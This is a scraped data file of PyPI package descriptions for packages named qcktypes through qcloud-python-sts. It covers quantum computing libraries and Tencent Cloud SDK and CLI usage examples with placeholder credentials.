want to validate files actually, just tell me what they areThe modulefiletypevalidates files with theirmagic numbersor whatever, but I didn't want that. I foundDyne's file extension listand quickly wrote up this module since I couldn't find anything similar. I would write more features but I know literally nobody will ever use this so it's probably fine.Rather than validating files with their magic numbers this module simply checks the extension of an input file and compares it with a dictionary of extensions and returns its category.Installingpython3 -m pip install -U qcktypesQuick exampleimportqcktypesfile='example.txt'category=qcktypes.find_type(file)print(f'{file}is in category:{category}!')output :$ python3 example.py\nexample.txt is in category: text!"} +{"package": "qcl", "pacakge-description": "UNKNOWN"} +{"package": "qclassify", "pacakge-description": "# QClassify## DescriptionQClassify is a Python framework for implementing variational quantum classifiers. The goal is to provide a generally customizable way of performing classification tasks using gate-model quantum devices. 
The quantum devices can be either simulated by a quantum simulator or a cloud-based quantum processor accessible via Rigetti Computing's [Quantum Cloud Services](https://www.rigetti.com/qcs).\nVariational quantum classification is a paradigm of supervised quantum machine learning that has been investigated actively in the quantum computing community (See for instance [Farhi and Neven](https://arxiv.org/abs/1802.06002), [Schuld et al.](https://arxiv.org/abs/1804.00633), [Mitarai et al.](https://arxiv.org/abs/1803.00745) and [Havlicek et al.](https://arxiv.org/abs/1804.11326)). The general framework adopted in the design of QClassify follows from these contributions in the literature. The workflow can be summarized in Figure 1 below.\n![Flow chart](https://github.com/zapatacomputing/QClassify/blob/master/images/qclassify.png)\n*Figure 1: Diagram illustrating the workflow of QClassify. Each rectangle represents a data object and each oval represents a method.*\n## Main Components\nThe main data structure describing the quantum classifier setting is in `qclassifier.py`. The implementation allows for modular design of the following components of a quantum classifier (Figure 1):\n1. **Encoder**: transforms a classical data vector into a quantum state. See `encoder.py`.\n+ 1.1 **Classical preprocessor**: maps an input data vector to circuit parameters. See `preprocessing.py`.\n+ 1.2 **Quantum state preparation**: applies the parametrized circuit to an all-zero input state to generate a quantum state encoding the input data. See `encoding_circ.py`.\n2. **Processor**: extracts classical information from the encoded quantum state. See `processor.py`.\n+ 2.1 **Quantum state transformation**: applies a parametrized circuit to the encoded quantum state to transform it into a form more amenable for information extraction by measurement and classical postprocessing. See `proc_circ.py`.\n+ 2.2 **Information extraction**: extract classical information from the output quantum state. See `postprocessing.py`.\n- 2.2.1 **Measurement**: repeatedly run the quantum circuit, perform measurements and collect measurement statistics\n- 2.2.2 **Classical postprocessing**: Glean information from the measurement statistics and produce the output label of the quantum classifier.\n## Installation\nTo install QClassify using ``pip``:\npip install qclassify\nTry executing ``import qclassify`` to test the installation in your terminal.\nTo instead install QClassify from source, clone this repository, ``cd`` into it, and run:\ngit clone https://github.com/zapatacomputing/QClassify\ncd QClassify\npython -m pip install -e .\nNote that the pyQuil version used requires Python 3.6 or later. For installation on a user QMI, please click [here](https://github.com/hsim13372/QCompress/blob/master/qmi_instructions.rst).\n## Examples\nWe provide a Jupyter notebook to demonstrate the utility of QClassify.\nNotebook | Feature(s)\n---------|---------------\n[qclassify_demo.ipynb](https://github.com/zapatacomputing/QClassify/blob/master/examples/qclassify_demo.ipynb) | Uses a simple two-qubit circuit to learn the XOR dataset.\n## Disclaimer\nWe note that there is a lot of room for improvement and fixes. Please feel free to submit issues and/or pull requests!\n## How to cite\nWhen using QClassify for research projects, please cite:\n> Sukin Sim, Yudong Cao, Jonathan Romero, Peter D. Johnson and Al\u00e1n Aspuru-Guzik. *A framework for algorithm deployment on cloud-based quantum computers*. [arXiv:1810.10576](https://arxiv.org/abs/1810.10576). 
2018.## Authors[Yudong Cao](https://github.com/yudongcao),[Sukin (Hannah) Sim](https://github.com/hsim13372) (Harvard)"} +{"package": "qcli", "pacakge-description": "UNKNOWN"} +{"package": "qclib", "pacakge-description": "Quantum computing library (qclib)Qclib is a quantum computing library implemented using qiskit.The focus of qclib is on preparing quantum states, but it is not limited to that.InstalationThe easiest way of installing qclib is by using pip:pipinstallqclibInitializing your first quantum state with qclibNow that qclib is installed, you can start building quantum circuits to prepare quantum states. Here is a basic example:$ pythonimportnumpyasnpfromqiskitimporttranspilefromqiskit_aerimportAerSimulatorfromqclib.state_preparationimportLowRankInitialize# Generate 3-qubit random input state vectorn=3rnd=np.random.RandomState(42)input_vector=rnd.rand(2**n)+rnd.rand(2**n)*1jinput_vector=input_vector/np.linalg.norm(input_vector)# Build a quantum circuit to initialize the input vectorcircuit=LowRankInitialize(input_vector).definition# Construct an ideal simulatorbackend=AerSimulator()# Tests whether the produced state vector is equal to the input vector.t_circuit=transpile(circuit,backend)t_circuit.save_statevector()state_vector=backend.run(t_circuit).result().get_statevector()print('Equal:',np.allclose(state_vector,input_vector))# Equal: TrueComparing algorithms for quantum state preparationThe following table shows the depth, number of qubits, and CNOTs of circuits produced by different state preparation methods for the same random 15-qubit state.methodlibqubitscnotsdepthlow-rankqclib153099853643svdqclib153881471580ucgqclib153275265505isometryqiskit153275265505multiplexorqiskit1565504131025bdspqclib1151723201603dcspqclib32767262016899You can reproduce the resultshere.AuthorsThe first version of qclib was developed atCentro de Inform\u00e1tica- UFPE.\nQclib is an active project, andother peoplehave contributed.If you are doing research using qclib, please cite our project.\nWe use aCITATION.cfffile, so you can easily copy the citation information from the repository landing page.Licenseqclib isfreeandopen source, released under the Apache License, Version 2.0."} +{"package": "qclient", "pacakge-description": "qclientClient for running quantum applications on qserver instances. Seehttps://quantum.tecnalia.com.InstallpipinstallqclientUsageimportqclientqclient.configure({'token':'YOUR_TOKEN'})print(qclient.get('bell'))print(qclient.execute('bell'))print(qclient.execute(circuit.qasm()))Methodsconfigure({ server?, ext? ,token? }):server: default server athttps://quantum.tecnalia.com.ext: default '.qasm', useful in case always using the same language to represent the algorithm.token: default '', authorization token to execute services. E.g.:configure({\"token':'kkajsdkj-sudiuawjd....\"}).get(algorithm_name): the algorithm in plain text, the extension of the file is optional. E.g.:get('bell').execute(algorithm_name or algorithm_description): based on the extension, an engine executes the algorithm and provides the result as string (depending on the engine, the result format can vary). E.g.:execute('bell'). If the algorithm is not stored yet, it can be executed by providing the text representation (in qasm, quil, etc.). E.g: execute('...qasm_string')."} +{"package": "q-client", "pacakge-description": "Q-clientThis is only a proxy toqclientpackage. Created only to prevent malicious packages with similar names. 
Useqclientinstead."} +{"package": "qclight", "pacakge-description": "Simple and lightweight Quantum Computing simulator built with python3 for educational purposes.InstallationpipinstallqclightExample\"\"\"Main\"\"\"fromqclight.circuitimportQCLVisualCircuitdefmain():\"\"\"Simple main function\"\"\"circuit=QCLVisualCircuit(4)circuit.h(0)circuit.cx(0,3)circuit.barrier()circuit.x(2)print(circuit)if__name__==\"__main__\":main()TODOImprove performance with a custom range function for fixed bitsMeasure qubitAdd more examplesPrint ascii of circuitPrint svg of circuitCircuit compositionCircuit to gateSumCircuit"} +{"package": "qclipx", "pacakge-description": "QClipXCross platform clipboard tool.RequirementsPySide6-EssentialspyhexeditInstallpip install qclipx"} +{"package": "qcloud", "pacakge-description": "# qcloudref:http://guide.python-distribute.org/creation.html"} +{"package": "qcloudapi", "pacakge-description": "UNKNOWN"} +{"package": "qcloudapi3", "pacakge-description": "qcloudapi3\u662f\u4e3a\u4e86\u8ba9Python3\u5f00\u53d1\u8005\u80fd\u591f\u5728\u81ea\u5df1\u7684\u4ee3\u7801\u91cc\u66f4\u5feb\u6377\u65b9\u4fbf\u7684\u4f7f\u7528\u817e\u8baf\u4e91\u7684API\u800c\u5f00\u53d1\u7684Python\u5e93\u3002Example>>> from qcloudapi3 import QcloudApi\n>>> _module = 'wenzhi'\n>>> action = 'TextSentiment'\n>>> config = {\n>>> 'Region': 'gz',\n>>> 'secretId': '123',\n>>> 'secretKey': '000',\n>>> 'method': 'post'\n>>> }\n>>> params = {\n>>> \"content\": \"\u6240\u6709\u4eba\u90fd\u5f88\u5dee\u52b2\u3002\",\n>>> }\n>>> service = QcloudApi(_module, config)\n>>> print('URL:\\n' + service.generateUrl(action, params))\n>>> print(service.call(action, params))\nURL:\nhttps://wenzhi.api.qcloud.com/v2/index.php\n{\"code\":0,\"message\":\"\",\"codeDesc\":\"Success\",\"positive\":0.048611093312502,\"negative\":0.95138889551163}Installpip install qcloudapi3AuthorYixian Du"} +{"package": "qcloudapi-sdk-python", "pacakge-description": "Qcloud Python SDK is the official software development kit, which allows Python developers to write software that makes use of qcloud services like CVM and CBS.The SDK works on Python versions:2.7 and greater, including 3.x.xQuick StartFirst, install the library:$pipinstallqcloudapi-sdk-pythonor download source code from github and install:$gitclonehttps://github.com/QcloudApi/qcloudapi-sdk-python.git$cdqcloudapi-sdk-python$pythonsetup.pyinstallThen, from a Python interpreter or script:>>>fromQcloudApi.qcloudapiimportQcloudApi>>>module='cvm'>>>action='DescribeInstances'>>>config={'Region':'ap-guangzhou','secretId':'xxxx','secretKey':'xxxx','Version':'2017-03-20'}>>>params={'Limit':1}>>>service=QcloudApi(module,config)>>>service.call(action,params)"} +{"package": "qcloud_ccs", "pacakge-description": "No description available on PyPI."} +{"package": "qcloudcli", "pacakge-description": "Tencent Cloud (aka QCloud) Command Line Interface qcloudcli is an open source tool built on top of the Tencent Cloud API that provides commands for interacting with Tencent Cloud services.It works on Python versions:2.7.x and greater3.6.x and greaterInstallThe recommended way to install qcloudcli is to usepip:$pipinstall--userqcloudcli--useroption will install qcloudcli to current user path instead of system path, for Linux system, it might be~/.local, which means it doesn\u2019t requiresudopriviledge.Attention!If you are in avirtualenvenvironment, the--useroption should be removed.Get the version of qcloudcli:$qcloudcli--versionto upgrade:$pipinstall--user--upgradeqcloudclito 
remove: $ pip uninstall --yes qcloudcliCommand Completion On Unix-like systems, the qcloudcli includes a command-completion feature that enables you to use the TAB key to complete a partially typed command. This feature is not automatically installed, so you need to configure it manually: $ complete -C qcloud_completer qcloudcli Add it to your ~/.bashrc to enable it by default.Usage Guide Configuration qcloudcli needs account information to interact with Tencent Cloud services. Log in to the Tencent Cloud Console and go to the API Credential Management page to view your credentials; if the list is empty, you will need to create a new one. SecretId is used like your account name and SecretKey is used like your password, so keep in mind to never leak your SecretKey to others.Attention! This page may not yet be available on the international site or in the English translation.Run qcloudcli configure to enter interactive mode and provide information like this: $ qcloudcli configure QcloudAPISecretId [None]: foo QcloudAPISecretKey [None]: bar RegionId (gz,hk,ca,sh,shjr,bj,sg) [None]: gz OutputFormat (json,table,text) [None]: json This information will be stored in files under your home directory; for example, on a Linux system it will be ~/.qcloudcli/configure and ~/.qcloudcli/credentials.The content of ~/.qcloudcli/configure in the last example is: [default]\noutput = json\nregion = gzThe content of ~/.qcloudcli/credentials in the last example is: [default]\nqcloud_secretkey = bar\nqcloud_secretid = fooAttention! This information is stored as plain text, so it relies on correct access control of your private home directory. On a Linux system, the default privileges are: $ ls -l ~/.qcloudcli/\ntotal 8\n4 -rw-rw-r-- 1 john john 36 Nov 29 23:35 configure\n4 -rw------- 1 john john 55 Nov 29 23:35 credentialsAttention! Currently, these two configuration files will not be removed when you uninstall qcloudcli; you will need to remove them manually.Use Help To get the list of available modules, including the configure command, run: $ qcloudcli help To get the action list of a specific module, for example cvm (Cloud Virtual Machine), run: $ qcloudcli cvm help To get the parameter list of a specific action, for example DescribeInstances, run: $ qcloudcli cvm DescribeInstances helpSpecify Complex Object Parameters To specify base type parameters, like string and int, you can use them directly. 
For example, to get instance (virtual machine) list, use default API version, limit the return item to 10, run:$ qcloudcli cvm DescribeInstances --limit 10For complex object parameters, like array and dictionary, you have to use json format string.For example, to get instance list, use default API version, only query instances which id areqcvmf4b542ad7b4cd49f2db57a733368d5b1andqcvmaf636dd06a816765b4f2c51595f2d84d, run:$ qcloudcli cvm DescribeInstances --instanceIds '[\"qcvmf4b542ad7b4cd49f2db57a733368d5b1\", \"qcvmaf636dd06a816765b4f2c51595f2d84d\"]'For example, to get instance list, use API version 2017-03-12, withFiltersparameter, only return instances in ap-guangzhou-2 zone, run:$ qcloudcli cvm DescribeInstances --Filters '[{\"Name\":\"zone\",\"Values\":[\"ap-guangzhou-2\"]}]'For example, to create new instances, use API version 2017-03-12, a complex example might be:$ qcloudcli cvm RunInstances --Placement '{\"Zone\":\"ap-beijing-3\"}' --InstanceChargeType PREPAID --InstanceChargePrepaid '{\"Period\":1,\"RenewFlag\":\"NOTIFY_AND_AUTO_RENEW\"}' --ImageId img-dkwyg6sr --InstanceType S2.SMALL1 --SystemDisk '{\"DiskType\":\"CLOUD_BASIC\",\"DiskSize\":50}' --InternetAccessible '{\"InternetChargeType\":\"TRAFFIC_POSTPAID_BY_HOUR\",\"InternetMaxBandwidthOut\":2,\"PublicIpAssigned\":\"TRUE\"}' --InstanceName prod-jumpserver-01 --EnhancedService '{\"SecurityService\":{\"Enabled\":\"TRUE\"},\"MonitorService\":{\"Enabled\":\"TRUE\"}}' --InstanceCount 1 --VirtualPrivateCloud '{\"VpcId\":\"vpc-njkwg482\",\"SubnetId\":\"subnet-6rs8ienn\"}'NOTE: HerePlacementhas specify availability zone to beap-beijing-3, so the region value in~/.qcloudcli/configuremust bebj, or you can specify global parameter--RegionIdap-beijingto override configured value.Filter Dataqcloudcli provides--filteroption which bases onjmespathto filter returned data, it is pretty useful when you want to get specific data from a bunch of items. 
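As an illustration of how such filter expressions are evaluated, here is a minimal Python sketch using the jmespath package that the --filter option is based on; the response dict is an abbreviated, made-up stand-in for real DescribeSecurityGroups output, so any field other than sgId is an assumption.

```python
# Sketch of how a --filter expression such as "data[*].sgId" is applied,
# using the jmespath package (pip install jmespath). The response below is
# a hypothetical, abbreviated stand-in for real API output.
import jmespath

response = {
    "code": 0,
    "data": [
        {"sgId": "sg-icy671l9", "sgName": "default"},
        {"sgId": "sg-o9rfv42p", "sgName": "web"},
    ],
}

# Roughly what: qcloudcli dfw DescribeSecurityGroups --filter data[*].sgId  does
sg_ids = jmespath.search("data[*].sgId", response)
print(sg_ids)        # ['sg-icy671l9', 'sg-o9rfv42p']

# Index-based expressions pick a single element the same way
first_id = jmespath.search("data[0].sgId", response)
print(first_id)      # 'sg-icy671l9'
```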
However, you need to know the exact structure of returned json format.For example, to get security groups and only return security gourp id, run:$ qcloudcli dfw DescribeSecurityGroups --filter data[*].sgId\n[\n \"sg-icy671l9\",\n \"sg-o9rfv42p\",\n \"sg-pknfyaar\",\n \"sg-2rjokpt7\",\n \"sg-4ehjaoh3\"\n]*means get all elements.For example, using CVM API version 2017-03-12, to get security groups id of a specific instance ins-od1laqxs, run:$ qcloudcli cvm DescribeInstances --InstanceIds '[\"ins-od1laqxs\"]' --filter Response.InstanceSet[0].SecurityGroupIds\n[\n \"sg-4ehjaoh3\"\n]The index0means get the first instance.Specify API VersionNOTE: New in version 1.9.0Some services of Tencent Cloud have multiple API versions, for example, CVM has a API version 2017-03-12, to use it, open~/.qcloudcli/configureand add the following content in profile section:api_versions =\n cvm = 2017-03-12If the specified version doesn\u2019t exist, you will get an error when you run related commands.\nIf the service only has one version, then you don\u2019t need to add such configuration, please remove it.\nIf the service has multiple versions, and there is no such configuration, then the default one will be used.Use HTTPS ProxyNOTE: New in version 1.8.9If you are in an environment behinds a proxy, and*.api.qcloud.comis not in the proxy white list, then you will need to configure HTTPS proxy to get qcloudcli work.Currently, only verified in Linux and Windows system, with proxy doesn\u2019t require user name and password.In Linux system, to set your temporary global proxy, run:$ export https_proxy=YourProxyRealHost:YourProxyRealPortPlease note that replaceYourProxyRealHostandYourProxyRealPortwith your real proxy information.\nYou can add it to your~/.bashrcto active it by default.In Windows system, to set your temporary global proxy, run:> set https_proxy=YourProxyRealHost:YourProxyRealPortYou can add it to your system environment variables to active it by default."} +{"package": "qcloud-cmq-sdk", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud-cmq-sdk-py3", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud_cos", "pacakge-description": "UNKNOWN"} +{"package": "qcloud_cos_py3", "pacakge-description": "version: 0.1.4OverviewA 3rd-party SDK for Qcloud COS and Python 3Installation / UsageDocs:https://su27.github.io/qcloud_cos_py3/Use pip to install:$ pip install qcloud_cos_py3Or clone the repo:$ git clonehttps://github.com/su27/qcloud_cos_py3.git$ python setup.py installContributing$ virtualenv -p python3.6 venv\n$ source venv/bin/activate\n$ pip install -r requirements.txt\n$ cp tests/config_example.py tests/config.py# Fill the blanks in the file and run\n$ make test-coverageIt\u2019s originally forked from [cos-python3-sdk](https://github.com/imu-hupeng/cos-python3-sdk)ExamplePlease checktests/test_cos.py"} +{"package": "qcloud-cos-python3", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud_cos_v3", "pacakge-description": "UNKNOWN"} +{"package": "qcloud_cos_v4", "pacakge-description": "\u4ecb\u7ecd\u817e\u8baf\u4e91COSv4\u7684Python SDK, \u76ee\u524d\u53ef\u4ee5\u652f\u6301Python2.6\u4e0ePython2.7\u3002\u5b89\u88c5\u6307\u5357\u4f7f\u7528pip\u5b89\u88c5pip install -U qcloud_cos_v4\u624b\u52a8\u5b89\u88c5:python setup.py install\u4f7f\u7528\u65b9\u6cd5\u4f7f\u7528python sdk\uff0c\u53c2\u7167sample.py# \u8bbe\u7f6e\u7528\u6237\u5c5e\u6027, \u5305\u62ecappid, secret_id\u548csecret_key# 
\u8fd9\u4e9b\u5c5e\u6027\u53ef\u4ee5\u5728cos\u63a7\u5236\u53f0\u83b7\u53d6(https://console.qcloud.com/cos)appid=100000# \u66ff\u6362\u4e3a\u7528\u6237\u7684appidsecret_id=u'xxxxxxxx'# \u66ff\u6362\u4e3a\u7528\u6237\u7684secret_idsecret_key=u'xxxxxxx'# \u66ff\u6362\u4e3a\u7528\u6237\u7684secret_keyregion_info=\"sh\"# \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 # \u66ff\u6362\u4e3a\u7528\u6237\u7684region\uff0c\u76ee\u524d\u53ef\u4ee5\u4e3a sh/gz/tj/sgp\uff0c\u5206\u522b\u5bf9\u5e94\u4e8e\u4e0a\u6d77\uff0c\u5e7f\u5dde\uff0c\u5929\u6d25,\u65b0\u52a0\u5761\u56ed\u533acos_client=CosClient(appid,secret_id,secret_key,region=region_info)# \u8bbe\u7f6e\u8981\u64cd\u4f5c\u7684bucketbucket=u'mybucket'############################################################################# \u6587\u4ef6\u64cd\u4f5c ############################################################################## 1. \u4e0a\u4f20\u6587\u4ef6(\u9ed8\u8ba4\u4e0d\u8986\u76d6)# \u5c06\u672c\u5730\u7684local_file_1.txt\u4e0a\u4f20\u5230bucket\u7684\u6839\u5206\u533a\u4e0b,\u5e76\u547d\u540d\u4e3asample_file.txt# \u9ed8\u8ba4\u4e0d\u8986\u76d6, \u5982\u679ccos\u4e0a\u6587\u4ef6\u5b58\u5728,\u5219\u4f1a\u8fd4\u56de\u9519\u8befrequest=UploadFileRequest(bucket,u'/sample_file.txt',u'local_file_1.txt')upload_file_ret=cos_client.upload_file(request)print'upload file ret:',repr(upload_file_ret)# 2. \u4e0a\u4f20\u6587\u4ef6(\u8986\u76d6\u6587\u4ef6)# 2.1\u4e0a\u4f20\u672c\u5730\u6587\u4ef6\uff0c\u5c06\u672c\u5730\u7684local_file_2.txt\u4e0a\u4f20\u5230bucket\u7684\u6839\u5206\u533a\u4e0b,\u8986\u76d6\u5df2\u4e0a\u4f20\u7684sample_file.txtrequest=UploadFileRequest(bucket,u'/sample_file.txt',u'local_file_2.txt')request.set_insert_only(0)# \u8bbe\u7f6e\u5141\u8bb8\u8986\u76d6upload_file_ret=cos_client.upload_file(request)print'overwrite file ret:',repr(upload_file_ret)# 2.2\u4ece\u5185\u5b58\u4e0a\u4f20\u6587\u4ef6request=UploadFileFromBufferRequest(bucket,u'/sample_file.txt',data)request.set_insert_only(0)# \u8bbe\u7f6e\u5141\u8bb8\u8986\u76d6upload_file_ret=cos_client.upload_file_from_buffer(request)print'overwrite file ret:',repr(upload_file_ret)# 3. \u83b7\u53d6\u6587\u4ef6\u5c5e\u6027request=StatFileRequest(bucket,u'/sample_file.txt')stat_file_ret=cos_client.stat_file(request)print'stat file ret:',repr(stat_file_ret)# 4. \u66f4\u65b0\u6587\u4ef6\u5c5e\u6027request=UpdateFileRequest(bucket,u'/sample_file.txt')request.set_biz_attr(u'this is demo file')# \u8bbe\u7f6e\u6587\u4ef6biz_attr\u5c5e\u6027,\u4e0d\u652f\u6301\u4e2d\u6587request.set_authority(u'eWRPrivate')# \u8bbe\u7f6e\u6587\u4ef6\u7684\u6743\u9650request.set_cache_control(u'cache_xxx')# \u8bbe\u7f6eCache-Controlrequest.set_content_type(u'application/text')# \u8bbe\u7f6eContent-Typerequest.set_content_disposition(u'ccccxxx.txt')# \u8bbe\u7f6eContent-Dispositionrequest.set_content_language(u'english')# \u8bbe\u7f6eContent-Languagerequest.set_x_cos_meta(u'x-cos-meta-xxx',u'xxx')# \u8bbe\u7f6e\u81ea\u5b9a\u4e49\u7684x-cos-meta-\u5c5e\u6027request.set_x_cos_meta(u'x-cos-meta-yyy',u'yyy')# \u8bbe\u7f6e\u81ea\u5b9a\u4e49\u7684x-cos-meta-\u5c5e\u6027update_file_ret=cos_client.update_file(request)print'update file ret:',repr(update_file_ret)# 5. \u66f4\u65b0\u540e\u518d\u6b21\u83b7\u53d6\u6587\u4ef6\u5c5e\u6027request=StatFileRequest(bucket,u'/sample_file.txt')stat_file_ret=cos_client.stat_file(request)print'stat file ret:',repr(stat_file_ret)# 6. 
\u79fb\u52a8\u6587\u4ef6, \u5c06sample_file.txt\u79fb\u52a8\u4f4dsample_file_move.txtrequest=MoveFileRequest(bucket,u'/sample_file.txt',u'/sample_file_move.txt')stat_file_ret=cos_client.move_file(request)print'move file ret:',repr(stat_file_ret)# 7. \u5220\u9664\u6587\u4ef6request=DelFileRequest(bucket,u'/sample_file_move.txt')del_ret=cos_client.del_file(request)print'del file ret:',repr(del_ret)# 8. \u4e0b\u8f7d\u6587\u4ef6request=DownloadFileRequest(bucket,u'/sample_file_move.txt')del_ret=cos_client.download_file(request)print'del file ret:',repr(del_ret)# 9. \u4e0b\u8f7d\u6587\u4ef6\u5230\u5185\u5b58request=DownloadObjectRequest(bucket,u'/sample_file_move.txt')fp=cos_client.download_object(request)fp.read()############################################################################# \u76ee\u5f55\u64cd\u4f5c ############################################################################## 1. \u751f\u6210\u76ee\u5f55, \u76ee\u5f55\u540d\u4e3asample_folderrequest=CreateFolderRequest(bucket,u'/sample_folder/')create_folder_ret=cos_client.create_folder(request)print'create folder ret:',create_folder_ret# 2. \u66f4\u65b0\u76ee\u5f55\u7684biz_attr\u5c5e\u6027request=UpdateFolderRequest(bucket,u'/sample_folder/',u'this is a test folder')# biz_attr\u4e0d\u652f\u6301\u4e2d\u6587update_folder_ret=cos_client.update_folder(request)print'update folder ret:',repr(update_folder_ret)# 3. \u83b7\u53d6\u76ee\u5f55\u5c5e\u6027request=StatFolderRequest(bucket,u'/sample_folder/')stat_folder_ret=cos_client.stat_folder(request)print'stat folder ret:',repr(stat_folder_ret)# 4. list\u76ee\u5f55, \u83b7\u53d6\u76ee\u5f55\u4e0b\u7684\u6210\u5458request=ListFolderRequest(bucket,u'/sample_folder/')list_folder_ret=cos_client.list_folder(request)print'list folder ret:',repr(list_folder_ret)# 5. 
\u5220\u9664\u76ee\u5f55request=DelFolderRequest(bucket,u'/sample_folder/')delete_folder_ret=cos_client.del_folder(request)print'delete folder ret:',repr(delete_folder_ret)"} +{"package": "qcloud_image", "pacakge-description": "UNKNOWN"} +{"package": "qcloud-python-sts", "pacakge-description": "\u83b7\u53d6 SDKpip install -U qcloud-python-sts\u8c03\u7528\u793a\u4f8b\u8bf7\u67e5\u770bdemo\u91cc\u7684\u793a\u4f8b\u3002\u63a5\u53e3\u8bf4\u660eget_credential\u83b7\u53d6\u4e34\u65f6\u5bc6\u94a5\u63a5\u53e3\u53c2\u6570\u8bf4\u660e\u5b57\u6bb5\u7c7b\u578b\u63cf\u8ff0secret_idString\u4e91 API \u5bc6\u94a5 Idsecret_keyString\u4e91 API \u5bc6\u94a5 keyduration_secondslong\u8981\u7533\u8bf7\u7684\u4e34\u65f6\u5bc6\u94a5\u6700\u957f\u6709\u6548\u65f6\u95f4\uff0c\u5355\u4f4d\u79d2\uff0c\u9ed8\u8ba4 1800\uff0c\u6700\u5927\u53ef\u8bbe\u7f6e 7200bucketString\u5b58\u50a8\u6876\u540d\u79f0\uff1abucketName-appid, \u5982 test-125000000regionString\u5b58\u50a8\u6876\u6240\u5c5e\u5730\u57df\uff0c\u5982 ap-guangzhouallow_prefixlist\u8d44\u6e90\u7684\u524d\u7f00\uff0c\u53ef\u4ee5\u6839\u636e\u81ea\u5df1\u7f51\u7ad9\u7684\u7528\u6237\u767b\u5f55\u6001\u5224\u65ad\u5141\u8bb8\u4e0a\u4f20\u7684\u5177\u4f53\u8def\u5f84\uff0c\u4f8b\u5b50\uff1a a.jpg \u6216\u8005 a/* \u6216\u8005 * (\u4f7f\u7528\u901a\u914d\u7b26*\u5b58\u5728\u91cd\u5927\u5b89\u5168\u98ce\u9669, \u8bf7\u8c28\u614e\u8bc4\u4f30\u4f7f\u7528)allow_actionslist\u6388\u4e88 COS API \u6743\u9650\u96c6\u5408, \u5982\u7b80\u5355\u4e0a\u4f20\u64cd\u4f5c\uff1aname/cos:PutObjectpolicydict\u7b56\u7565\uff1a\u7531 allow_actions\u3001bucket\u3001allow_prefix\u5b57\u6bb5\u7ec4\u6210\u7684\u63cf\u8ff0\u6388\u6743\u7684\u5177\u4f53\u4fe1\u606f\u8fd4\u56de\u503c\u8bf4\u660e\u5b57\u6bb5\u7c7b\u578b\u63cf\u8ff0credentialsdict\u4e34\u65f6\u5bc6\u94a5\u4fe1\u606ftmpSecretIdString\u4e34\u65f6\u5bc6\u94a5 Id\uff0c\u53ef\u7528\u4e8e\u8ba1\u7b97\u7b7e\u540dtmpSecretKeyString\u4e34\u65f6\u5bc6\u94a5 Key\uff0c\u53ef\u7528\u4e8e\u8ba1\u7b97\u7b7e\u540dsessionTokenString\u8bf7\u6c42\u65f6\u9700\u8981\u7528\u7684 token \u5b57\u7b26\u4e32\uff0c\u6700\u7ec8\u8bf7\u6c42 COS API \u65f6\uff0c\u9700\u8981\u653e\u5728 Header \u7684 x-cos-security-token \u5b57\u6bb5startTimeString\u5bc6\u94a5\u7684\u8d77\u59cb\u65f6\u95f4\uff0c\u662f UNIX \u65f6\u95f4\u6233expiredTimeString\u5bc6\u94a5\u7684\u5931\u6548\u65f6\u95f4\uff0c\u662f UNIX \u65f6\u95f4\u6233\u8fd4\u56de\u7ed3\u679c\u6210\u529f\u7684\u8bdd\uff0c\u53ef\u4ee5\u62ff\u5230\u5305\u542b\u5bc6\u94a5\u7684 JSON \u6587\u672c\uff1a{\"credentials\":{\"tmpSecretId\":\"AKIDEPMQB_Q9Jt2fJxXyIekOzKZzx-sdGQgBga4TzsUdTWL9xlvsjInOHhCYFqfoKOY4\",\"tmpSecretKey\":\"W/3Lbl1YEW02mCoawIesl5kNehSskrSbp1cT1tgW70g=\",\"sessionToken\":\"c6xnSYAxyFbX8Y50627y9AA79u6Qfucw6924760b61588b79fea4c277b01ba157UVdr_10Y30bdpYtO8CXedYZe3KKZ_DyzaPiSFfNAcbr2MTfAgwJe-dhYhfyLMkeCqWyTNF-rOdOb0rp4Gto7p4yQAKuIPhQhuDd77gcAyGakC2WXHVd6ZuVaYIXBizZxqIHAf4lPiLHa6SZejSQfa_p5Ip2U1cAdkEionKbrX97xTKTcA_5Pu525CFSzHZIQibc2uNMZ-IRdQp12MaXZB6bxM6nB4xXH45mDIlbIGjaAsrtRJJ3csmf82uBKaJrYQoguAjBepMH91WcH87LlW9Ya3emNfVX7NMRRf64riYd_vomGF0TLgan9smEKAOdtaL94IkLvVJdhLqpvjBjp_4JCdqwlFAixaTzGJHdJzpGWOh0mQ6jDegAWgRYTrJvc5caYTz7Vphl8XoX5wHKKESUn_vqyTAid32t0vNYE034FIelxYT6VXuetYD_mvPfbHVDIXaFt7e_O8hRLkFwrdAIVaUml1mRPvccv2qOWSXs\"},\"expiration\":\"2019-08-07T08:54:35Z\",\"startTime\":1565166275,\"expiredTime\":1565168075}get_policy\u83b7\u53d6\u7b56\u7565(policy)\u63a5\u53e3\u3002\u672c\u63a5\u53e3\u9002\u7528\u4e8e\u63a5\u6536 Web\u3001iOS\u3001Android \u5ba2\u6237\u7aef SDK \u63d0\u4f9b\u7684 Scope 
\u53c2\u6570\u3002\u63a8\u8350\u60a8\u628a Scope \u53c2\u6570\u653e\u5728\u8bf7\u6c42\u7684 Body \u91cc\u9762\uff0c\u901a\u8fc7 POST \u65b9\u5f0f\u4f20\u5230\u540e\u53f0\u3002\u53c2\u6570\u8bf4\u660e\u5b57\u6bb5\u7c7b\u578b\u63cf\u8ff0bucketString\u5b58\u50a8\u6876\u540d\u79f0\uff1abucketName-appid, \u5982 test-125000000regionString\u5b58\u50a8\u6876\u6240\u5c5e\u5730\u57df\uff0c\u5982 ap-guangzhouresource_prefixString\u8d44\u6e90\u7684\u524d\u7f00\uff0c\u53ef\u4ee5\u6839\u636e\u81ea\u5df1\u7f51\u7ad9\u7684\u7528\u6237\u767b\u5f55\u6001\u5224\u65ad\u5141\u8bb8\u4e0a\u4f20\u7684\u5177\u4f53\u8def\u5f84\uff0c\u4f8b\u5b50\uff1a a.jpg \u6216\u8005 a/* \u6216\u8005 * (\u4f7f\u7528\u901a\u914d\u7b26*\u5b58\u5728\u91cd\u5927\u5b89\u5168\u98ce\u9669, \u8bf7\u8c28\u614e\u8bc4\u4f30\u4f7f\u7528)actionString\u6388\u4e88 COS API \u6743\u9650\uff0c, \u5982\u7b80\u5355\u4e0a\u4f20\u64cd\u4f5c\uff1aname/cos:PutObjectscopeScope\u6784\u9020policy\u7684\u4fe1\u606f\uff1a\u7531 